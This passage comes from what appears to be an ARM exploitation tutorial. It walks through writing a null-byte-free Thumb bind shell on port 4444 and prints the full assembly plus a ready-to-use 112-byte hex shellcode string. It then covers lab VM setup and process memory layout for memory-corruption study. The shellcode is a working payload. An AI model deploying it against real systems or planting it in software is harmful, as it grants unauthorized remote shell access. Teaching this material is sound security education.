    host_sockid = socket(PF_INET, SOCK_STREAM, 0); 

    // Initialize sockaddr struct to bind socket using it 
    hostaddr.sin_family = AF_INET;                  // server socket type address family = internet protocol address
    hostaddr.sin_port = htons(4444);                // server port, converted to network byte order
    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   // listen to any address, converted to network byte order

    // Bind socket to IP/Port in sockaddr struct 
    bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); 

    // Listen for incoming connections 
    listen(host_sockid, 2); 

    // Accept incoming connection 
    client_sockid = accept(host_sockid, NULL, NULL); 

    // Duplicate file descriptors for STDIN, STDOUT and STDERR 
    dup2(client_sockid, 0); 
    dup2(client_sockid, 1); 
    dup2(client_sockid, 2); 

    // Execute /bin/sh 
    execve("/bin/sh", NULL, NULL); 
    close(host_sockid); 

    return 0; 
}

STAGE ONE: SYSTEM FUNCTIONS AND THEIR PARAMETERS

The first step is to identify the necessary system functions, their parameters, and their system call numbers. Looking at the C code above, we can see that we need the following functions: socket, bind, listen, accept, dup2, execve. You can figure out the system call numbers of these functions with the following command:

pi@raspberrypi:~/bindshell $ cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep socket
#define __NR_socketcall             (__NR_SYSCALL_BASE+102)
#define __NR_socket                 (__NR_SYSCALL_BASE+281)
#define __NR_socketpair             (__NR_SYSCALL_BASE+288)
#undef __NR_socketcall

If you’re wondering about the value of __NR_SYSCALL_BASE, it’s 0:

root@raspberrypi:/home/pi# grep -R "__NR_SYSCALL_BASE" /usr/include/arm-linux-gnueabihf/asm/
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_SYSCALL_BASE 0

These are all the syscall numbers we’ll need:

#define __NR_socket    (__NR_SYSCALL_BASE+281)
#define __NR_bind      (__NR_SYSCALL_BASE+282)
#define __NR_listen    (__NR_SYSCALL_BASE+284)
#define __NR_accept    (__NR_SYSCALL_BASE+285)
#define __NR_dup2      (__NR_SYSCALL_BASE+ 63)
#define __NR_execve    (__NR_SYSCALL_BASE+ 11)
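If you prefer to collect these numbers programmatically rather than by eye, the lookup can be sketched as follows. This is only an illustration: it parses a pasted copy of the define lines shown above instead of reading the header from disk, and the names `HEADER_TEXT`, `DEFINE_RE` and `parse_syscalls` are made up for this example.

```python
import re

# Sample lines in the same shape as the unistd.h output shown above.
HEADER_TEXT = """
#define __NR_SYSCALL_BASE 0
#define __NR_socket    (__NR_SYSCALL_BASE+281)
#define __NR_bind      (__NR_SYSCALL_BASE+282)
#define __NR_listen    (__NR_SYSCALL_BASE+284)
#define __NR_accept    (__NR_SYSCALL_BASE+285)
#define __NR_dup2      (__NR_SYSCALL_BASE+ 63)
#define __NR_execve    (__NR_SYSCALL_BASE+ 11)
"""

# Matches '#define __NR_<name> (__NR_SYSCALL_BASE+<n>)', tolerating spaces before <n>.
DEFINE_RE = re.compile(r"#define\s+__NR_(\w+)\s+\(__NR_SYSCALL_BASE\+\s*(\d+)\)")

def parse_syscalls(text, base=0):
    """Return {name: number} for every matching define line in `text`."""
    return {name: base + int(offset) for name, offset in DEFINE_RE.findall(text)}

if __name__ == "__main__":
    table = parse_syscalls(HEADER_TEXT)
    for name, number in sorted(table.items(), key=lambda kv: kv[1]):
        print("%-8s %3d  0x%03x" % (name, number, number))
```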

The parameters each function expects can be looked up in the Linux man pages, or on w3challs.com.

The next step is to figure out the specific values of these parameters. One way of doing that is to look at a successful bind shell connection using strace, a tool you can use to trace system calls and monitor interactions between processes and the Linux kernel. Let’s use strace to test the C version of our bind shell. To reduce the noise, we limit the output to the functions we’re interested in.

Terminal 1:
pi@raspberrypi:~/bindshell $ gcc bind_test.c -o bind_test
pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
Terminal 2:
pi@raspberrypi:~ $ netstat -tlpn
Proto Recv-Q  Send-Q  Local Address  Foreign Address  State     PID/Program name
tcp    0      0       0.0.0.0:22     0.0.0.0:*        LISTEN    - 
tcp    0      0       0.0.0.0:4444   0.0.0.0:*        LISTEN    1058/bind_test 
pi@raspberrypi:~ $ netcat -nv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!

This is our strace output:

pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
execve("./bind_test", ["./bind_test"], [/* 49 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 2) = 0
accept(3, 0, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/sh", [0], [/* 0 vars */]) = 0

Now we can fill in the gaps and note down the values we’ll need to pass to the functions of our assembly bind shell.

STAGE TWO: STEP BY STEP TRANSLATION

In the first stage, we answered the following questions to get everything we need for our assembly program:

  1. Which functions do I need?
  2. What are the system call numbers of these functions?
  3. What are the parameters of these functions?
  4. What are the values of these parameters?

This step is about applying this knowledge and translating it to assembly. Split each function into a separate chunk and repeat the following process:

  1. Map out which register you want to use for which parameter
  2. Figure out how to pass the required values to these registers
    1. How to pass an immediate value to a register
    2. How to nullify a register without directly moving a #0 into it (we need to avoid null-bytes in our code and must therefore find other ways to nullify a register or a value in memory)
    3. How to make a register point to a region in memory which stores constants and strings
  3. Use the right system call number to invoke the function and keep track of register content changes
    1. Keep in mind that the result of a system call will land in r0, which means that if you need to reuse that result in a later function, you must save it into another register before invoking the next system call.
    2. Example: host_sockid = socket(2, 1, 0) – the result (host_sockid) of the socket call will land in r0. This result is reused in other functions like listen(host_sockid, 2), and should therefore be preserved in another register.

0 – Switch to Thumb Mode

The first thing you should do to reduce the possibility of encountering null-bytes is to use Thumb mode. In ARM mode the instructions are 32 bits wide; in Thumb mode they are 16 bits. This means that we can already reduce the chance of having null-bytes by simply reducing the size of our instructions. To recap how to switch to Thumb mode: ARM instructions must be 4-byte aligned. To change the mode from ARM to Thumb, set the LSB (Least Significant Bit) of the next instruction’s address (found in PC) to 1 by adding 1 to the PC register’s value and saving it to another register. Then use a BX (Branch and eXchange) instruction to branch to this other register, which contains the address of the next instruction with the LSB set to one; this makes the processor switch to Thumb mode. It all boils down to the following two instructions.

.section .text
.global _start
_start:
    .ARM
    add     r3, pc, #1            
    bx      r3

From here you will be writing Thumb code and will therefore need to indicate this by using the .THUMB directive in your code.
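The address arithmetic behind the two-instruction switch can be checked with a small model. It relies on two architectural facts: in ARM state, reading PC yields the address of the current instruction plus 8, and BX uses bit 0 of the target to select the instruction set. The load address 0x10054 is an arbitrary, hypothetical value, and the function names are illustrative.

```python
def pc_as_read_in_arm_state(instr_addr):
    """In ARM state, PC reads as the current instruction's address + 8."""
    return instr_addr + 8

def bx(target):
    """Model BX: bit 0 selects Thumb (1) or ARM (0) and is cleared from the address."""
    mode = "thumb" if target & 1 else "arm"
    return target & ~1, mode

if __name__ == "__main__":
    start = 0x10054                            # hypothetical address of 'add r3, pc, #1'
    r3 = pc_as_read_in_arm_state(start) + 1    # add r3, pc, #1
    addr, mode = bx(r3)                        # bx r3
    print(hex(addr), mode)
```

The branch target works out to start + 8, which is exactly the first instruction after the 4-byte add and the 4-byte bx, now executed in Thumb state.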

1 – Create new Socket

 

These are the values we need for the socket call parameters:

root@raspberrypi:/home/pi# grep -R "AF_INET\|PF_INET \|SOCK_STREAM =\|IPPROTO_IP =" /usr/include/
/usr/include/linux/in.h: IPPROTO_IP = 0,                               // Dummy protocol for TCP 
/usr/include/arm-linux-gnueabihf/bits/socket_type.h: SOCK_STREAM = 1,  // Sequenced, reliable, connection-based
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define PF_INET 2       // IP protocol family. 
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define AF_INET PF_INET

After setting up the parameters, you invoke the socket system call with the svc instruction. The result of this invocation will be our host_sockid and will end up in r0. Since we need host_sockid later on, let’s save it to r4.

In ARM, you can’t simply move any immediate value into a register. If you’re interested in more details about this nuance, there is a section in the Memory Instructions chapter (at the very end).

To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don’t look) called rotator.py.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 281
Sorry, 281 cannot be used as an immediate number and has to be split.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 200
The number 200 can be used as a valid immediate number.
50 ror 30 --> 200

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 81
The number 81 can be used as a valid immediate number.
81 ror 0 --> 81
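The script itself is not reproduced here, so the following is only a sketch of the kind of check such a tool could perform, not the author’s rotator.py. It tests whether a 32-bit value fits the ARM-state data-processing immediate encoding (an 8-bit value rotated right by an even amount); `arm_immediate` is a hypothetical name.

```python
def arm_immediate(value):
    """Return (imm8, rotation) if value == imm8 ROR rotation, else None.

    ARM-state data-processing immediates are an 8-bit value rotated
    right by an even amount (0, 2, ..., 30).
    """
    value &= 0xFFFFFFFF
    for rotation in range(0, 32, 2):
        # Rotating left by `rotation` undoes a rotate-right by `rotation`.
        imm8 = ((value << rotation) | (value >> (32 - rotation))) & 0xFFFFFFFF
        if imm8 < 256:
            return imm8, rotation
    return None

if __name__ == "__main__":
    for candidate in (281, 200, 81):
        print(candidate, arm_immediate(candidate))
```

This returns the first encoding it finds, so it may report a different but equivalent rotation from the one rotator.py prints. Note also that the final snippet runs in Thumb state, where the 16-bit forms of mov and add take a plain 8-bit immediate (0 to 255); 281 does not fit there either, while 200 and 81 both do.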

Final code snippet:

    .THUMB
    mov     r0, #2
    mov     r1, #1
    sub     r2, r2, r2
    mov     r7, #200
    add     r7, #81                // r7 = 281 (socket syscall number) 
    svc     #1                     // r0 = host_sockid value 
    mov     r4, r0                 // save host_sockid in r4

2 – Bind Socket to Local Port

 

With the first instruction, we store a structure object containing the address family, host port and host address in the literal pool and reference this object with pc-relative addressing. The literal pool is a memory area in the same section (because the literal pool is part of the code) storing constants, strings, or offsets. Instead of calculating the pc-relative offset manually, you can use an ADR instruction with a label. ADR accepts a PC-relative expression, that is, a label with an optional offset where the address of the label is relative to the PC label. Like this:

// bind(r0, &sockaddr, 16)
 adr r1, struct_addr    // pointer to address, port
 [...]
struct_addr:
.ascii "\x02\xff"       // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"       // port number 4444 
.byte 1,1,1,1           // IP Address

The next 5 instructions are STRB (store byte) instructions. A STRB instruction stores one byte from a register to a calculated memory region. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset.

In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the local port we want to use, and the IP address. We could either use a static IP address, or we could specify 0.0.0.0 to make our bind shell listen on all IPs which the target is configured with, making our shellcode more portable. Now, those are a lot of null-bytes.

Again, the reason we want to get rid of any null-bytes is to make our shellcode usable for exploits that take advantage of memory corruption vulnerabilities that might be sensitive to null-bytes. Some buffer overflows are caused by improper use of functions like ‘strcpy’. The job of strcpy is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work. With the strb instruction we take a null byte from a register and modify our own code during execution. This way, we don’t actually have a null byte in our shellcode, but dynamically place it there. This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.
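The truncation effect is easy to demonstrate outside of any exploit. The sketch below only imitates the copy semantics of strcpy on Python bytes; `strcpy_like` and `null_offsets` are illustrative helpers, not part of any library.

```python
def strcpy_like(src):
    """Copy bytes up to (not including) the first null byte, as strcpy would."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]

def null_offsets(payload):
    """Offsets of every null byte in a payload."""
    return [i for i, b in enumerate(payload) if b == 0]

if __name__ == "__main__":
    with_null = b"\x02\x00\x11\x5c"       # AF_INET written with its real null byte
    placeholder = b"\x02\xff\x11\x5c"     # same bytes with the 0xff placeholder
    print(len(strcpy_like(with_null)), null_offsets(with_null))
    print(len(strcpy_like(placeholder)), null_offsets(placeholder))
```

With the real null byte in place, everything after the first byte is lost in the copy; with the placeholder, all four bytes survive.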

For this reason, we code without null-bytes and dynamically put a null-byte in places where it’s necessary. As you can see in the next picture, the IP address we specify is 1.1.1.1 which will be replaced by 0.0.0.0 during execution.

 

The first STRB instruction replaces the placeholder \xff in \x02\xff with \x00 to set the AF_INET to \x02\x00. How do we know that it’s a null byte being stored? Because r2 contains only zeros, thanks to the “sub r2, r2, r2” instruction that cleared the register. The next 4 instructions replace 1.1.1.1 with 0.0.0.0. Instead of the four strb instructions after strb r2, [r1, #1], you can also use one single str r2, [r1, #4] to do a full 0.0.0.0 write.

The move instruction puts the length of the sockaddr_in structure (2 bytes for AF_INET, 2 bytes for PORT, 4 bytes for ipaddress, 8 bytes padding = 16 bytes) into r2. Then, we set r7 to 282 by simply adding 1 to it, because r7 already contains 281 from the last syscall.

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr   // pointer to address, port
    strb r2, [r1, #1]     // write 0 for AF_INET
    strb r2, [r1, #4]     // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]     // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]     // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]     // replace 1 with 0 in 0.0.0.x
    mov r2, #16
    add r7, #1            // r7 = 281+1 = 282 (bind syscall number) 
    svc #1
    nop
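To make the effect of those strb instructions concrete, the sketch below models the 8 bytes stored at struct_addr as Python bytes and applies the same byte writes. The expected layout is built with the struct and socket modules, assuming a little-endian target (as on the Raspberry Pi used here) and AF_INET = 2 as shown in the header grep earlier; the helper names are illustrative.

```python
import socket
import struct

AF_INET = 2  # value taken from the header output shown earlier

# Bytes as they sit in the shellcode: no null bytes anywhere.
PLACEHOLDER = b"\x02\xff" + b"\x11\x5c" + bytes([1, 1, 1, 1])

def patch_like_strb(data):
    """Write a zero byte at offsets 1, 4, 5, 6 and 7, as the strb sequence does."""
    patched = bytearray(data)
    for offset in (1, 4, 5, 6, 7):
        patched[offset] = 0
    return bytes(patched)

def sockaddr_in_prefix(port, ip):
    """First 8 bytes of sockaddr_in: family (host order), port and IP (network order)."""
    return struct.pack("<H", AF_INET) + struct.pack(">H", port) + socket.inet_aton(ip)

if __name__ == "__main__":
    print(b"\x00" in PLACEHOLDER)
    print(patch_like_strb(PLACEHOLDER) == sockaddr_in_prefix(4444, "0.0.0.0"))
```

The second check also confirms that \x11\x5c is port 4444 in network byte order.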

3 – Listen for Incoming Connections

Here we put the previously saved host_sockid into r0. R1 is set to 2, and r7 is just increased by 2 since it still contains the 282 from the last syscall.

mov     r0, r4     // r0 = saved host_sockid 
mov     r1, #2
add     r7, #2     // r7 = 284 (listen syscall number)
svc     #1

4 – Accept Incoming Connection

 

Here again, we put the saved host_sockid into r0. Since we want to avoid null bytes, we don’t directly move #0 into r1 and r2, but instead set each of them to 0 by subtracting the register from itself. R7 is just increased by 1. The result of this invocation will be our client_sockid, which we will save in r4, because we will no longer need the host_sockid that was kept there (we will skip the close function call from our C code).

    mov     r0, r4          // r0 = saved host_sockid 
    sub     r1, r1, r1      // clear r1, r1 = 0
    sub     r2, r2, r2      // clear r2, r2 = 0
    add     r7, #1          // r7 = 285 (accept syscall number)
    svc     #1
    mov     r4, r0          // save result (client_sockid) in r4
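Because r7 is never reloaded between the first four system calls, it is worth double-checking that the running total matches the syscall numbers collected in stage one. The following sketch replays the mov/add sequence from the snippets above; the table and function names are illustrative.

```python
SYSCALLS = {"socket": 281, "bind": 282, "listen": 284, "accept": 285}

# (instruction, immediate, syscall invoked once r7 holds the result)
R7_UPDATES = [
    ("mov", 200, None),       # mov r7, #200
    ("add", 81, "socket"),    # add r7, #81
    ("add", 1, "bind"),       # add r7, #1
    ("add", 2, "listen"),     # add r7, #2
    ("add", 1, "accept"),     # add r7, #1
]

def trace_r7(updates):
    """Replay the mov/add sequence and return [(syscall, r7)] at each svc."""
    r7 = 0
    seen = []
    for op, imm, syscall in updates:
        r7 = imm if op == "mov" else r7 + imm
        if syscall is not None:
            seen.append((syscall, r7))
    return seen

if __name__ == "__main__":
    for name, value in trace_r7(R7_UPDATES):
        print(name, value, value == SYSCALLS[name])
```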

5 – STDIN, STDOUT, STDERR

 

For the dup2 functions, we need the syscall number 63. The saved client_sockid needs to be moved into r0 once again, and the sub instruction sets r1 to 0. For the remaining two dup2 calls, we only need to change r1 and reset r0 to the client_sockid after each system call.

    /* dup2(client_sockid, 0) */
    mov     r7, #63                // r7 = 63 (dup2 syscall number) 
    mov     r0, r4                 // r4 is the saved client_sockid 
    sub     r1, r1, r1             // r1 = 0 (stdin) 
    svc     #1
    /* dup2(client_sockid, 1) */
    mov     r0, r4                 // r4 is the saved client_sockid 
    add     r1, #1                 // r1 = 1 (stdout) 
    svc     #1
    /* dup2(client_sockid, 2) */
    mov     r0, r4                 // r4 is the saved client_sockid
    add     r1, #1                 // r1 = 1+1 (stderr) 
    svc     #1

6 – Spawn the Shell

 

 

// execve("/bin/sh", 0, 0) 
 adr r0, shellcode     // r0 = location of "/bin/shX"
 eor r1, r1, r1        // clear register r1. R1 = 0
 eor r2, r2, r2        // clear register r2. r2 = 0
 strb r2, [r0, #7]     // replace the X in "/bin/shX" with a null byte
 mov r7, #11           // execve syscall number
 svc #1
 nop

The execve() function we use in this example follows the same process as in the Writing ARM Shellcode tutorial where everything is explained step by step.

Finally, we put the value AF_INET (with 0xff, which will be replaced by a null), the port number, IP address, and the “/bin/sh” string at the end of our assembly code.

struct_addr:
.ascii "\x02\xff"      // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"     // port number 4444 
.byte 1,1,1,1        // IP Address 
shellcode:
.ascii "/bin/shX"

FINAL ASSEMBLY CODE

This is what our final bind shellcode looks like.

.section .text
.global _start
    _start:
    .ARM
    add r3, pc, #1         // switch to thumb mode 
    bx r3

    .THUMB
// socket(2, 1, 0)
    mov r0, #2
    mov r1, #1
    sub r2, r2, r2      // set r2 to null
    mov r7, #200        // r7 = 200
    add r7, #81         // r7 = 281 (socket); split because 281 does not fit in an 8-bit immediate
    svc #1              // r0 = host_sockid value
    mov r4, r0          // save host_sockid in r4

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr // pointer to address, port
    strb r2, [r1, #1]    // write 0 for AF_INET
    strb r2, [r1, #4]    // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]    // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]    // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]    // replace 1 with 0 in 0.0.0.x
    mov r2, #16          // struct address length
    add r7, #1           // r7 = 282 (bind) 
    svc #1
    nop

// listen(sockfd, 2) 
    mov r0, r4           // set r0 to saved host_sockid
    mov r1, #2           // r1 = 2 (backlog)
    add r7, #2           // r7 = 284 (listen syscall number) 
    svc #1        

// accept(sockfd, NULL, NULL); 
    mov r0, r4           // set r0 to saved host_sockid
    sub r1, r1, r1       // set r1 to null
    sub r2, r2, r2       // set r2 to null
    add r7, #1           // r7 = 284+1 = 285 (accept syscall)
    svc #1               // r0 = client_sockid value
    mov r4, r0           // save new client_sockid value to r4  

// dup2(sockfd, 0) 
    mov r7, #63         // r7 = 63 (dup2 syscall number) 
    mov r0, r4          // r4 is the saved client_sockid 
    sub r1, r1, r1      // r1 = 0 (stdin) 
    svc #1

// dup2(sockfd, 1)
    mov r0, r4          // r4 is the saved client_sockid 
    add r1, #1          // r1 = 1 (stdout) 
    svc #1

// dup2(sockfd, 2) 
    mov r0, r4          // r4 is the saved client_sockid
    add r1, #1          // r1 = 2 (stderr) 
    svc #1

// execve("/bin/sh", 0, 0) 
    adr r0, shellcode   // r0 = location of "/bin/shX"
    eor r1, r1, r1      // clear register r1. r1 = 0
    eor r2, r2, r2      // clear register r2. r2 = 0
    strb r2, [r0, #7]   // overwrite the trailing X of "/bin/shX" with a null-byte
    mov r7, #11         // execve syscall number
    svc #1
    nop

struct_addr:
.ascii "\x02\xff" // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c" // port number 4444 
.byte 1,1,1,1 // IP Address 
shellcode:
.ascii "/bin/shX"

TESTING SHELLCODE

Save your assembly code into a file called bind_shell.s. Don’t forget the -N flag when using ld. The reason for this is that we use multiple strb operations to modify our code section (.text). This requires the code section to be writable, which can be achieved by adding the -N flag during the linking process.

pi@raspberrypi:~/bindshell $ as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell
pi@raspberrypi:~/bindshell $ ./bind_shell

Then, connect to your specified port:

pi@raspberrypi:~ $ netcat -vv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!
uname -a
Linux raspberrypi 4.4.34+ #3 Thu Dec 1 14:44:23 IST 2016 armv6l GNU/Linux

It works! Now let’s translate it into a hex string with the following command:

pi@raspberrypi:~/bindshell $ objcopy -O binary bind_shell bind_shell.bin
pi@raspberrypi:~/bindshell $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bind_shell.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x12\xa1\x4a\x70\x0a\x71\x4a\x71\x8a\x71\xca\x71\x10\x22\x01\x37\x01\xdf\xc0\x46\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x1a\x92\x1a\x01\x37\x01\xdf\x04\x1c\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58

Voilà, le bind shellcode! This shellcode is 112 bytes long. Since this is a beginner tutorial and we want to keep it simple, the shellcode is not as short as it could be. After making the initial shellcode work, you can try to find ways to reduce the number of instructions and so make the shellcode shorter.
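
The 0xff, 1.1.1.1 and X placeholders exist so that the encoded shellcode contains no null bytes. A quick way to double-check both the length and the absence of nulls is a few lines of C. This is a sketch only: the array name bind_shell and the helper count_null_bytes are hypothetical, and the bytes are simply the hexdump output from above.

```c
#include <assert.h>
#include <stddef.h>

/* The hexdump output from above as a C array. The compiler appends one
 * terminating NUL to the literal, so the payload is sizeof - 1 bytes. */
const unsigned char bind_shell[] =
    "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27"
    "\x51\x37\x01\xdf\x04\x1c\x12\xa1\x4a\x70\x0a\x71\x4a\x71\x8a\x71"
    "\xca\x71\x10\x22\x01\x37\x01\xdf\xc0\x46\x20\x1c\x02\x21\x02\x37"
    "\x01\xdf\x20\x1c\x49\x1a\x92\x1a\x01\x37\x01\xdf\x04\x1c\x3f\x27"
    "\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31"
    "\x01\xdf\x05\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\xc0\x46"
    "\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58";

/* Hypothetical helper: count the 0x00 bytes in the first len bytes of buf. */
size_t count_null_bytes(const unsigned char *buf, size_t len)
{
    size_t nulls = 0;

    assert(buf != NULL);
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            nulls++;
    }
    return nulls;
}
```

Calling count_null_bytes(bind_shell, sizeof bind_shell - 1) returns 0 for this payload, and sizeof bind_shell - 1 evaluates to the 112 bytes mentioned above.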

ARM LAB ENVIRONMENT

Let’s say you got curious about ARM assembly or exploitation and want to write your first assembly programs or solve some ARM challenges. For that you either need an ARM device (e.g. a Raspberry Pi), or you can set up a lab environment in a VM for quick access.

This page contains 3 levels of lab setup laziness.

  • Manual Setup – Level 0
  • Ain’t nobody got time for that – Level 1
  • Ain’t nobody got time for that – Level 2

MANUAL SETUP – LEVEL 0

If you have the time and nerves to set up the lab environment yourself, I’d recommend doing it. You might get stuck, but you might also learn a lot in the process. Knowing how to emulate things with QEMU also enables you to choose what ARM version you want to emulate in case you want to practice on a specific processor.

How to emulate Raspbian with QEMU.

AIN’T NOBODY GOT TIME FOR THAT – LEVEL 1

Welcome to laziness level 1. I see you don’t have time to struggle through various Linux and QEMU errors, or maybe you’ve tried setting it up yourself but some random error occurred and after spending hours trying to fix it, you’ve had enough.

Don’t worry, here’s a solution: Hugsy (aka creator of GEF) released ready-to-play QEMU images for architectures like ARM, MIPS, PowerPC, SPARC, AARCH64, etc. All you need is QEMU. Then download your image from the link below and unzip the archive.

Become a ninja on non-x86 architectures

AIN’T NOBODY GOT TIME FOR THAT – LEVEL 2

Let me guess, you don’t want to bother with any of this and just want a ready-made Ubuntu VM with all the QEMU stuff set up and ready to play. Very well. The first Azeria-Labs VM is ready. It’s a naked Ubuntu VM containing an emulated ARMv6l.

This VM is also for those of you who tried emulating ARM with QEMU but got stuck for inexplicable Linux reasons. I understand the struggle, trust me.

Download here:

VMware image size:

  • Downloaded zip: Azeria-Lab-v1.7z (4.62 GB)
    • MD5: C0EA2F16179CF813D26628DC792C5DE6
    • SHA1: 1BB1ABF3C277E0FD06AF0AECFEDF7289730657F2
  • Extracted VMware image: ~16GB

Password: azerialabs

Host system specs:

  • Ubuntu 16.04.3 LTS 64-bit (kernel 4.10.0-38-generic) with Gnome 3
  • HDD: ~26GB (ext4) + ~4GB Swap
  • RAM (configured): 4GB

QEMU setup:

  • Raspbian 8 (27-04-10-raspbian-jessie) 32-bit (kernel qemu-4.4.34-jessie)
  • HDD: ~8GB
  • RAM: ~256MB
  • Tools: GDB (Raspbian 7.7.1+dfsg-5+rpi1) with GEF

I’ve included a Lab VM Starter Guide and set it as the background image of the VM. It explains how to start up QEMU, how to write your first assembly program, how to assemble and disassemble, and some debugging basics. Enjoy!

ARM PROCESS MEMORY AND MEMORY CORRUPTIONS

PROCESS MEMORY AND MEMORY CORRUPTIONS

The prerequisite for this part of the tutorial is a basic understanding of ARM assembly (covered in the first tutorial series “ARM Assembly Basics”). In this chapter you will get an introduction to the memory layout of a process in a 32-bit Linux environment. After that you will learn the fundamentals of Stack and Heap related memory corruptions and what they look like in a debugger.

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer
  3. Format String

The examples used in this tutorial are compiled on an ARMv6 32-bit processor. If you don’t have access to an ARM device, you can create your own lab and emulate a Raspberry Pi distro in a VM by following this tutorial: Emulate Raspberry Pi with QEMU. The debugger used here is GDB with GEF (GDB Enhanced Features). If you aren’t familiar with these tools, you can check out this tutorial: Debugging with GDB and GEF.

MEMORY LAYOUT OF A PROCESS

Every time we start a program, a memory area for that program is reserved. This area is then split into multiple regions. Those regions are then split into even more regions (segments), but we will stick with the general overview. So, the parts we are interested in are:

  1. Program Image
  2. Heap
  3. Stack

In the picture below we can see a general representation of how those parts are laid out within the process memory. The addresses used to specify memory regions are just for the sake of an example, because they will differ from environment to environment, especially when ASLR is used.

The Program Image region holds the program’s executable file as it was loaded into memory. This memory region can be split into various segments: .plt, .text, .got, .data, .bss and so on. These are the most relevant. For example, .text contains the executable part of the program with all the Assembly instructions, .data and .bss hold the variables or pointers to variables used in the application, and .plt and .got store pointers to functions imported from, for example, shared libraries. From a security standpoint, if an attacker could affect the integrity of (rewrite) the .text section, they could execute arbitrary code. Similarly, corruption of the Procedure Linkage Table (.plt) and Global Offset Table (.got) could under specific circumstances lead to execution of arbitrary code.

The Stack and Heap regions are used by the application to store and operate on temporary data (variables) that are used during the execution of the program. These regions are commonly exploited by attackers, because data in the Stack and Heap regions can often be modified by the user’s input, which, if not handled properly, can cause a memory corruption. We will look into such cases later in this chapter.

In addition to the mapping of the memory, we need to be aware of the attributes associated with different memory regions. A memory region can have one or a combination of the following attributes: Read, Write, eXecute. The Read attribute allows the program to read data from a specific region. Similarly, Write allows the program to write data into a specific memory region, and Execute – execute instructions in that memory region. We can see the process memory regions in GEF (a highly recommended extension for GDB) as shown below:

azeria@labs:~/exp $ gdb program
...
gef> gef config context.layout "code"
gef> break main
Breakpoint 1 at 0x104c4: file program.c, line 6.
gef> run
...
gef> nexti 2
-----------------------------------------------------------------------------------------[ code:arm ]----
...
      0x104c4 <main+20>        mov    r0,  #8
      0x104c8 <main+24>        bl     0x1034c <malloc@plt>
->    0x104cc <main+28>        mov    r3,  r0
      0x104d0 <main+32>        str    r3,  [r11,  #-8]
...
gef> vmmap
Start      End        Offset     Perm Path
0x00010000 0x00011000 0x00000000 r-x /home/azeria/exp/program <---- Program Image
0x00020000 0x00021000 0x00000000 rw- /home/azeria/exp/program <---- Program Image continues...
0x00021000 0x00042000 0x00000000 rw- [heap] <---- HEAP
0xb6e74000 0xb6f9f000 0x00000000 r-x /lib/arm-linux-gnueabihf/libc-2.19.so <---- Shared library (libc)
0xb6f9f000 0xb6faf000 0x0012b000 --- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6faf000 0xb6fb1000 0x0012b000 r-- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb1000 0xb6fb2000 0x0012d000 rw- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb2000 0xb6fb5000 0x00000000 rw-
0xb6fcc000 0xb6fec000 0x00000000 r-x /lib/arm-linux-gnueabihf/ld-2.19.so <---- Shared library (ld)
0xb6ffa000 0xb6ffb000 0x00000000 rw-
0xb6ffb000 0xb6ffc000 0x0001f000 r-- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffc000 0xb6ffd000 0x00020000 rw- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffd000 0xb6fff000 0x00000000 rw-
